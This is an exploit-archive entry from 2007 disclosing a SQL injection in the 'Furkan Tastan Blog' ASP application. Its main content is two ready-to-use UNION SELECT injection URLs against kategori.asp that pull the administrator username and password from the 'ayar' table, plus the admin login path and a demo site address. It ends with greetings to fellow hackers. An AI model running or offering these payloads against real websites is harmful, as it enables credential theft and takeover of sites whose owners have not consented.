id: 2193
date: 10/04/2007
title: Furkan Tastan Blog Remote SQL Injection Vulnerability
author: CyberGhost
cves: 

=====================================================
Furkan Tastan Blog Remote SQL Injection Vulnerability
=====================================================



#Title  : Furkan Tastan Blog Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page   : http://furkantastan.somee.com/blog

#Vuln.

#Username : /kategori.asp?kat=goster&id=-1+union+select+0,1,adkull,3,4,5,6,7,8+from+ayar
#Password : /kategori.asp?kat=goster&id=-1+union+select+0,1,adsif,3,4,5,6,7,8+from+ayar

#Admin Login : /admin/admin.asp

====================================

Saz Arkadaslar?m: Hackinger - KinSize - dumenci - Kerem125 - Gsy - F10

And All TURKISH HACKERS !



#  0day.today [2023-03-24]  #